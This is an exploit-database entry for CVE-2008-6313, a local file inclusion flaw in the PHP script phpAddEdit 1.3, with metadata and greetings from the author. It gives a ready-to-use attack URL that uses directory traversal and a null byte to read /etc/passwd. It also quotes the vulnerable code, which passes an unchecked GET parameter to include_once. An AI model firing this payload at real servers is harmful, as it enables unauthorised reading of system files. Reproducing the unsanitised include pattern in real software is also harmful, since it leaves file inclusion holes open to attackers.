phpAddEdit 1.3 - 'editform' Local File Inclusion

Author: nuclear
type: webapps
platform: php
port: 
date_added: 2008-12-09  
date_updated: 2017-01-06  
verified: 1  
codes: OSVDB-50653;CVE-2008-6313  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphpaddedit-1.3.zip  

raw file: 7417.txt  
#phpaddedit-1.3 LFI


#Author: nuclear


#script:http://sourceforge.net/projects/phpaddedit/


#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00


#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
    include_once ($formname."-header.inc.php");
    include_once ($addeditcwd."addedit-create-form.php");
    include_once ($formname."-footer.inc.php");
}




#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r

# milw0rm.com [2008-12-10]